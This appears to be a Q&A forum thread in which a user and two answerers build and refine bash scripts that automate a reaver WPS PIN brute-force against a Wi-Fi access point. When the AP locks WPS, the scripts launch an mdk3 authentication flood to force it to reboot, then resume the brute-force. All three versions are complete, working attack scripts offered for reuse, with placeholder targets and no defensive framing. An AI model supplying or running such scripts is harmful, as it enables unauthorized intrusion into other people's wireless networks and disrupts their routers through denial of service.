Bash script for reaver to unlock WPS-locked status

2017-02-06 76 views
2

First, sorry for my poor English. I am trying to write a bash script to perform a WPS crack on an AP with reaver. The problem is that after trying some WPS PINs the AP locks WPS, so my reaver is no longer useful.

To solve this, I run an mdk3 attack that forces the AP to reboot so I can attack it again (after the reboot, WPS is unlocked again).

The problems with this approach are:

  1. I have to be in front of the PC when the AP gets locked,
  2. launch the mdk3 attack, stop it when the AP reboots and run the attack again. The solution to this is obviously a script.

I wrote the following lines to solve this.

I have to say I am a total noob at bash scripting, so the script is not "professional", it is just a "workaround" for my problem.

#!/bin/bash 

while true; do 
    # Switch to the correct channel and save it into $channel 
    echo Detecting AP channel 
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel 
    rm ap_channel 2> /dev/null 
    touch ap_channel 
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel 
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)" 
    rm ap_channel 

    # Attacks the AP while it isn't wps-locked 
    rm ap_status 2> /dev/null 
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    while [ -z "$(grep Locked ap_status)" ]; do 
     echo Performing reaver attack 
     aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon 
     timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f 
     rm ap_status 
     timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    done 

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked 
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null & 
    mdk3_pid=$! 
    rm ap_status 
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    while [ -n "$(grep Locked ap_status)" ]; do 
     echo Trying to reboot the AP 
     rm ap_status 
     timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    done 

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack 
    kill -9 $mdk3_pid 
    echo AP rebooted. Waiting 2 mins till AP init 
    sleep 120 
done 

The problem with this script is that the airodump-ng output I use is redirected from standard output, and the command runs differently when I execute it directly on the command line than when I execute it inside the script.

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 

I need a way to execute the line above inside the script as if I ran it directly in a tty. I cannot use exec for this because I need the script to keep running.

Note: I cannot use airodump-ng's -w option because it does not save the WPS status.

Can anyone help me?

Answers

0

I finally got it. I found a workaround for the problem of redirecting the command's standard output to a file. I am posting the script, maybe someone can use it.

#!/bin/bash

while true; do 

rm attack 
rm ap_status 
rm ap_channel 

# Detects the AP channel 
echo Detecting AP channel 
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel 
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel 
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)" 
rm ap_channel 
echo Detected AP channel $channel 

# Attacks the AP using reaver till the AP locks the WPS 
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
airodump_pid=$! 
sleep 10 
kill -9 $airodump_pid 

while [ -z "$(grep Locked ap_status)" ]; do 
    echo Performing reaver attack 
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon 
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f 
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 10 
    kill -9 $airodump_pid 
done 

# Force a reboot in the AP to unlock WPS 
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack & 
mdk3_pid=$! 

((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
airodump_pid=$! 
sleep 10 
kill -9 $airodump_pid 

while [ -n "$(grep Locked ap_status -m 1)" ]; do 
    echo Trying to reboot the AP 
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 10 
    kill -9 $airodump_pid 
done 

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack 
kill -9 $mdk3_pid 
echo AP rebooted. Waiting 5 mins till AP init 
rm attack 
rm ap_status 
sleep 300 

done 

The delays are set long, but they are OK. It depends on the AP; you can change them.

To use the script you need the aircrack, reaver (latest version, the one with the --wps option), timeout and mdk3 packages.

If anyone who knows bash scripting wants to modify the script and upload a better one, that would be great!

0

My variant. Fixed delays are replaced with a dynamic wait. It counts PIN attempts and wait time.

Replace "-C gnome-screenshot -f" with your screenshot program or remove it.

#!/bin/bash

while true; do 

rm attack 2> null 
rm ap_status 2> null 
rm ap_channel 2> null 
rm assoc 2> null 

AP_SSID="TARGET_ESSID" 
AP_BSSID="TARGET_BSSID" 
MY_MAC="YOU_MAC" 
MON_INTERFACE=wlan0mon 
PREV_SESS_FILE="PREV_SESSION_FILE.wpc" 
countTryPin=0 
countFile=totalTryPinCount # count file to store total try pin 
waitTryReboot=0 # count wait time AP rebooting (DDOS MDK3) 
waitReboot=0 # count wait time AP recovery after rebooting 
touch $countFile 

echo -e -n "\n\nDetect channel" 

touch assoc 
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc & 
assoc_pid=$! 

while [ -z "$(grep Associated assoc)" ]; do 
    sleep 3 
    echo -n . 
done 

echo -e "\n\n" 
kill -9 $assoc_pid 
wait $assoc_pid 2> null 
rm assoc 

echo -n "Wait association" 
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel & 
    ap_channel_pid=$! 
while [ -z "$(grep successful ap_channel)" ]; do 
     sleep 1 
     echo -n "." 
done 

channel="$(head -1 ap_channel | tail -c 3 | head -c 2)" 
echo -e "\n\nChannel set to $channel\n\n" 
rm ap_channel 

touch ap_status 
echo -n -e "\nCheck AP WPS lock" 
while [ -z "$(grep $AP_SSID ap_status)" ]; do 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    echo -n . 
    sleep 1 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 

echo -e "\n\n" 
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 

while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do 
    sleep 2 
done 

kill -9 $airodump_pid 
wait $airodump_pid 2> null 

while [ -z "$(grep Locked ap_status -m 1)" ]; do 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    echo -e "\n\nBegin reaver attack\n\n" 
    echo -n "Wait association" 
     ((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel & 
     ap_channel_pid=$! 
    while [ -z "$(grep successful ap_channel)" ]; do 
     sleep 1 
     echo -n "." 
    done 
    echo -e "\n\n" 
    timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove "-C gnome-screenshot -f" or replace it with your screenshot program 
    countTryPin=$[countTryPin + 1] 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 


# Force a reboot in the AP to unlock WPS 
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack & 
mdk3_pid=$! 

echo -e "\n\n" 
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 4 
    waitTryReboot=$[waitTryReboot + 4] 
    echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec." 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack 
kill -9 $mdk3_pid 
wait $mdk3_pid 2> null 

totalTryPin=`cat $countFile` 
totalTryPin=$(($totalTryPin + $countTryPin)) 
echo $totalTryPin > $countFile 

echo -e "\n\n" 
while [ -z "$(grep $AP_SSID ap_status)" ]; do 
    # After reboot AP may be change channel. Run without channel 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 5 
    waitReboot=$[waitReboot + 5] 
    echo -e -n "\rAP rebooting. Wait $waitReboot sec." 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 

rm attack 
rm ap_status 
rm null 
execTime=$(($SECONDS+$waitTryReboot+$waitReboot)) 
echo -e "\n\nDone $countTryPin try pin.\ 
      \nCalling reboot AP wait time $waitTryReboot sec.\ 
      \nAP rebooting wait time $waitReboot sec.\ 
      \nTotal execute time $SECONDS sec.\ 
      \nTotal try pin $totalTryPin\n\n" 
sleep 3 
SECONDS=0 
done